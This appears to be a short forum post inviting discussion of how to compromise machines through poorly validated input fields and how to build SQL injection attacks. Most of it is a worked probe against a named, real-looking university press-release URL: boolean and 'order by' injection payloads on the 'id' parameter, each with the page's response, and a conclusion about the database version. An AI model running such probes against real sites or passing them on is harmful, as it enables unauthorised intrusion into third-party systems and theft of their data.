How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack.
http://www.cpr.cuhk.edu.hk/sc/press_detail.php?id=121
and 1=1 true
adn 1=2 a picture disappeared.
order by 1--true
order by 2--a picture disappeared.
mysql version >5